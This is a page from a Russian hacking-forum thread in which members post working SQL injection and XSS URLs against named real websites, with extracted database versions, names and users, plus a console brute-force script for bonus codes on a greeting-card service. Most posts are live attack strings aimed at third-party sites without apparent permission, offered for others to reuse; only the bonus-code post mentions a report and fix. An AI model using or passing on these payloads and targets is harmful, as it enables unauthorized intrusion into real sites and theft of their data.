Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

Page 12 of 18
  1. spize0r

    spize0r Member

    Joined:
    2 Apr 2016
    Messages:
    40
    Likes Received:
    12
    Reputations:
    4
    Code:
    http://supersleep.ru/?ITEM_ID=2776+/*!12345union*//*!12345select*/version%28%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
    5.5.43-0+deb7u1
     
    #221 spize0r, 7 Apr 2016
  2. spize0r

    spize0r Member

    Joined:
    2 Apr 2016
    Messages:
    40
    Likes Received:
    12
    Reputations:
    4
    Code:
    http://www.dutchaero.nl/index.php?catid=13+/*!12345union*//*!12345select*/version%28%29,2,3,4,5,6
     
    #222 spize0r, 7 Apr 2016
  3. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    #223 SaNDER, 7 Apr 2016
  4. Егорыч+++

    Егорыч+++ Admin
    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    #224 Егорыч+++, 7 Apr 2016
  5. spize0r

    spize0r Member

    Joined:
    2 Apr 2016
    Messages:
    40
    Likes Received:
    12
    Reputations:
    4
    Code:
    http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,version%28%29,3,4,5,version%28%29,7--+-
    5.0.83
    Code:
    http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,database%28%29,3,4,5,version%28%29,7--+-
    teamboad
    Code:
    http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,user%28%29,3,4,5,version%28%29,7--+-
    [email protected]
     
    #225 spize0r, 14 Apr 2016
    WallHack likes this.
  6. Егорыч+++

    Егорыч+++ Admin
    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    уже заезжанный сайт
     
    #226 Егорыч+++, 14 Apr 2016
  7. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Может запретить такие ссылки?
    Тема вроде для публикация лично найдены уязвимостей, а [t] подставляет софт.
    Человек закинул ссылки в программу и она кучей их проверяет.
    При публикации даже [t] не убирают.
     
    _________________________
    #227 kingbeef, 15 Apr 2016
    qwaszx000, leksadin, Octavian and 1 other person like this.
  8. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    #228 pw0ned, 15 Apr 2016
  9. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Там вроде и фильтров нету...
     
    _________________________
    #229 kingbeef, 15 Apr 2016
  10. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    <script>alert()</script>

    фильтрует
     
    #230 pw0ned, 15 Apr 2016
  11. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    _________________________
    #231 kingbeef, 15 Apr 2016
    Octavian likes this.
  12. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    #232 Octavian, 19 Apr 2016
    BabaDook likes this.
  13. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    PHP:
    http://vic.md/ro/notebook/list/all/1/producator_ID=9999)+and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database() limit 81,1),0x3a,floor(rand(0)*2))y from information_schema.tables  group by y ) x)+AND+(1)=(1 #   

    AND+(1)=(1 это не нужно. Просто 9999 без )
     
    #233 BabaDook, 19 Apr 2016
    Octavian likes this.
  14. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    http://takky-shop.ru/images/img/log.txt
    Открытый лог .
    Reflected XSS
    Code:
    http://takky-shop.ru/category/"><script>alert()</script>
    Code:
    http://takky-shop.ru/search
    в поисковике тоже XSS .
     
    #234 SaNDER, 18 Aug 2016
  15. waydam

    waydam New Member

    Joined:
    14 Aug 2016
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    10minutemail.com
    XSS

    Еще интересная особенность, письмо дублируется много раз и каждый раз выскакивает алерт, не знаю с чем это связано)
     
    #235 waydam, 22 Aug 2016
    Last edited: 22 Aug 2016
  16. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    #236 BabaDook, 23 Aug 2016
  17. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    Солью не столь давний ресерч дабы разбавить скульки да хсски. Как отправлять бесплатно открытки на сервисе voicecards.ru?
    Логическая уязвимость на сервисе voicecard.ru, позволяет отправлять бесплатно голосовые открытки.
    Баг находился в сервисе бонус кодов, то есть бонус код является номером. И при авторизации не через телефон, можно спокойно запустить JQuery скрипт, который с легкостью подберет его за секунды и отправит смс (в дальнейшем его приведу). Теперь детально:
    Первое, авторизовываемся не через телефон, а средствами забытого пароля:
    [​IMG]
    Вызываем форму отправки бонус кода, чтобы вызвать нужную нам форму для подбора.
    [​IMG]
    Далее тупо перебираем скриптом в консоле
    Code:
    for (var i = 800000; i < 800100; i++) { $('.bonus-text').val(i); $('.bonus-send').click(); }
    Что интересно под авторизацией через телефон дает только три попытки, а через средство забытого пароля без ввода телефона - без проблем сколько угодно, связано скорее всего с куками.
    Ну и профитик
    [​IMG]
    Репорт отправлен и на момент написания статьи уже пофикшено. А добрые ребятки отправили мне в благодарность много бесплатных кодов.
     
    _________________________
    #237 SooLFaa, 22 Sep 2016
    Inoms, Octavian, palec2006 and 1 other person like this.
  18. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    #238 BabaDook, 25 Oct 2016
    Last edited: 26 Oct 2016
  19. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    #239 Octavian, 29 Nov 2016
  20. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    #240 pw0ned, 29 Nov 2016
(You must log in or sign up to post here.)
Page 12 of 18
Loading...
Similar Threads - Уязвимости SQLi
  1. zase

    массовый взлом сайтов

    zase, 25 Dec 2022, in forum: Песочница
    Replies:
    1
    Views:
    3,527
    lifescore
    14 Jan 2023
  2. Shadows_God

    Взлом сайтов

    Shadows_God, 20 Nov 2022, in forum: Песочница
    Replies:
    14
    Views:
    7,995
    CyberTro1n
    4 May 2024
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.